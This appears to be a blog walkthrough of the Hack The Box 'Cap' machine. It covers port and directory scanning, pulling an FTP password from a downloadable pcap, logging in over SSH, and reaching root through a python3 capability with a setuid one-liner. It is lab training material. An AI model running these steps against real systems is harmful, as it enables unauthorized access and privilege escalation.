top of page

Cap


Enumeration



nmap -sV 10.129.228.42



Port 80 is open. Let's check it by entering the IP address in our browser.



gobuster dir -w /usr/share/dirb/wordlists/common.txt -u 10.129.228.42

Now let's open our browser again and check:

10.129.228.42/data
10.129.228.42/ip
10.129.228.42/netstat

10.129.228.42/data seems interesting. I tried several combinations but found something interesting with 10.129.228.42/data/0


If you type 10.129.228.42/data/0 in your browser, you find a file to download.

Download the file. It is called 0.pcap


Looks like a pcap file, so let's open Wireshark and look more into it.


In Parrot machine, go to Applications --> Pentesting --> Sniffing and Spoofing --> wireshark



Once Wireshark loads, Click on File --> Open


Locate your 0.pcap file and click on open



In the filter field, type FTP to filter only the FTP protocol. We can see the password used by Nathan in plaintext!


Foothold


We know that ssh is open too so let's try that:

ssh nathan@10.129.228.42

You are prompted to enter a password. Enter the password we just found.


The credentials worked and we are in.


ls

cat user.txt

You got your flag!



Privilege Escalation


id

getcap -r / 2>/dev/null

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Now we are root!


id


ls


cd /root

ls

cat root.txt

Now we got the root flag too!


Congratulations!





238 views0 comments

Recent Posts

See All

Previse

Backdoor

Lame

Comments

Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page